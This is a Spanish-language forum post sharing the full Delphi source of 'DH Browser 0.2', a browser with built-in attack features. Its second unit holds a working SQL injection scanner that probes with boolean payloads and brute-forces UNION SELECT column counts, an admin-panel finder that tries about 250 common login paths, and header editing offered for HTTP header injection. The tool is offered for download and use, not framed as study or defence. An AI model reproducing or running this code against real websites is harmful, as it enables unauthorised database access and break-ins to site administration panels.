- Podes ver el codigo HTML de la pagina cargada
- Se puede buscar palabras en el codigo HTML
- Poder modificar los headers para HTTP header injection
- Trae un SQLI Scanner para buscar vulnerabilidades SQLI
- Trae un PanelFinder para buscar el panel del admin
Unas imagenes :
El codigo :
Carga
Código
// DH Browser 0.2 // (C) Doddy Hackman 2013 unit dhbrowse; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, acPNG, ExtCtrls, ComCtrls, acProgressBar, sGroupBox, sSkinManager; type TForm1 = class(TForm) sGroupBox1: TsGroupBox; sProgressBar1: TsProgressBar; Timer1: TTimer; Image1: TImage; sSkinManager1: TsSkinManager; procedure Button1Click(Sender: TObject); procedure Timer1Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation uses programa; {$R *.dfm} procedure TForm1.Button1Click(Sender: TObject); begin Form2.Show; end; procedure TForm1.FormCreate(Sender: TObject); begin sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data'; sSkinManager1.SkinName := 'tv-b'; sSkinManager1.Active := True; end; procedure TForm1.Timer1Timer(Sender: TObject); var i: integer; total: integer; begin total := 0; sProgressBar1.Min := 0; sProgressBar1.Max := 100; For i := 1 to 100 do begin Form1.Update; Sleep(1000); // Sleep(1); total := total + 10; sProgressBar1.Position := total; if (sProgressBar1.Position = 100) then begin Timer1.Enabled := False; Form1.Hide; Form2.Show; Abort; end; end; end; end. // The End ?
Navegador
Código
// DH Browser 0.2 // (C) Doddy Hackman 2013 // Credits : // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242 // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143 // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm unit programa; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo, sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG, ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar; type TForm2 = class(TForm) sSkinManager1: TsSkinManager; sGroupBox1: TsGroupBox; sEdit1: TsEdit; sButton1: TsButton; sGroupBox2: TsGroupBox; sMemo1: TsMemo; sCheckBox1: TsCheckBox; sGroupBox3: TsGroupBox; sStatusBar1: TsStatusBar; WebBrowser1: TWebBrowser; sGroupBox4: TsGroupBox; sButton2: TsButton; sButton3: TsButton; sGroupBox5: TsGroupBox; sButton4: TsButton; sLabel1: TsLabel; Image1: TImage; sMemo2: TsMemo; PopupMenu1: TPopupMenu; S1: TMenuItem; S2: TMenuItem; IdHTTP1: TIdHTTP; PerlRegEx1: TPerlRegEx; FindDialog1: TFindDialog; sProgressBar1: TsProgressBar; procedure sButton1Click(Sender: TObject); procedure S1Click(Sender: TObject); procedure S2Click(Sender: TObject); procedure sButton3Click(Sender: TObject); procedure sButton2Click(Sender: TObject); procedure sButton4Click(Sender: TObject); procedure FindDialog1Find(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure WebBrowser1ProgressChange(ASender: TObject; Progress, ProgressMax: Integer); procedure WebBrowser1DownloadComplete(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form2: TForm2; implementation {$R *.dfm} procedure TForm2.FindDialog1Find(Sender: TObject); // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143 var aca: PChar; aca2: PChar; acatoy: PChar; acatoy2: Word; begin With Sender as TFindDialog do begin GetMem(aca2, Length(FindText) + 1); StrPCopy(aca2, FindText); acatoy2 := sMemo2.GetTextLen + 1; GetMem(aca, acatoy2); sMemo2.GetTextBuf(aca, acatoy2); acatoy := aca + sMemo2.SelStart + sMemo2.SelLength; acatoy := StrPos(acatoy, aca2); if not(acatoy = NIL) then begin sMemo2.SelStart := acatoy - aca; sMemo2.SelLength := Length(FindText); end; sMemo2.SetFocus; end; end; procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction); begin Application.Terminate; end; procedure TForm2.FormCreate(Sender: TObject); begin sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data'; sSkinManager1.SkinName := 'tv-b'; sSkinManager1.Active := True; end; procedure TForm2.S1Click(Sender: TObject); begin WebBrowser1.Visible := false; sMemo2.Visible := True; end; procedure TForm2.S2Click(Sender: TObject); begin WebBrowser1.Visible := True; sMemo2.Visible := false; end; procedure TForm2.sButton1Click(Sender: TObject); // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242 var cabeceras: OLEVariant; uno: OLEVariant; dos: OLEVariant; tres: OLEVariant; begin uno := navNoReadFromCache or navNoWriteToCache; dos := ''; tres := ''; if (sCheckBox1.Checked) then begin cabeceras := sMemo1.Text; WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras); end else begin cabeceras := ''; WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras); end; end; procedure TForm2.sButton2Click(Sender: TObject); var pass1: string; pass2: string; code: string; urltest: string; urlgen: string; full: string; codedos: string; i: Integer; begin sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...'; Form2.sStatusBar1.Update; pass1 := '+'; pass2 := '--'; urltest := 'concat(0x4b30425241,1,0x4b30425241)'; sStatusBar1.Panels[0].Text := '[+] Checking ...'; Form2.sStatusBar1.Update; code := IdHTTP1.Get (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2); codedos := IdHTTP1.Get (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2); if not(code = codedos) then begin sStatusBar1.Panels[0].Text := '[+] Finding columns number'; Form2.sStatusBar1.Update; urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)'; urlgen := '1'; for i := 2 to 36 do begin sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i); Form2.sStatusBar1.Update; urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) + ',0x4b30425241)'; urlgen := urlgen + ',' + IntToStr(i); code := IdHTTP1.Get(sEdit1.Text + urltest + pass2); PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA'; PerlRegEx1.Subject := code; if PerlRegEx1.Match then begin urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1], 'hackman', []); full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 + urlgen; sEdit1.Text := full; Abort; end; end; end; sStatusBar1.Panels[0].Text := '[+] Done'; Form2.sStatusBar1.Update; end; procedure TForm2.sButton3Click(Sender: TObject); const paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/'); var IdHTTP: TIdHTTP; i: Integer; control: Integer; begin control := 0; sStatusBar1.Panels[0].Text := '[+] Finding Panel ....'; Form2.sStatusBar1.Update; IdHTTP := TIdHTTP.Create(nil); for i := Low(paginas) to High(paginas) do if (control = 1) then begin Abort; end else begin try sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i]; Form2.sStatusBar1.Update; IdHTTP.Get(sEdit1.Text + '/' + paginas[i]); if IdHTTP.ResponseCode = 200 then begin sStatusBar1.Panels[0].Text := '[+] Done'; Form2.sStatusBar1.Update; sEdit1.Text := sEdit1.Text + '/' + paginas[i]; control := 1; end; except on E: EIdHttpProtocolException do ; on E: Exception do ; end; end; sStatusBar1.Panels[0].Text := '[+] Done'; Form2.sStatusBar1.Update; end; procedure TForm2.sButton4Click(Sender: TObject); begin FindDialog1.Execute; end; procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject); var buscador: IHTMLElement; begin sProgressBar1.Position := 0; // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm begin try begin sMemo2.Clear; buscador := (WebBrowser1.Document AS IHTMLDocument2).body; while not(buscador.parentElement = nil) do begin buscador := buscador.parentElement; end; sMemo2.Lines.Add(buscador.outerHTML); end; except // ?? end; end; end; procedure TForm2.WebBrowser1ProgressChange(ASender: TObject; Progress, ProgressMax: Integer); begin sProgressBar1.Max := ProgressMax; sProgressBar1.Position := Progress; end; end. // The End ?
Si lo quieren bajar lo pueden hacer de aca.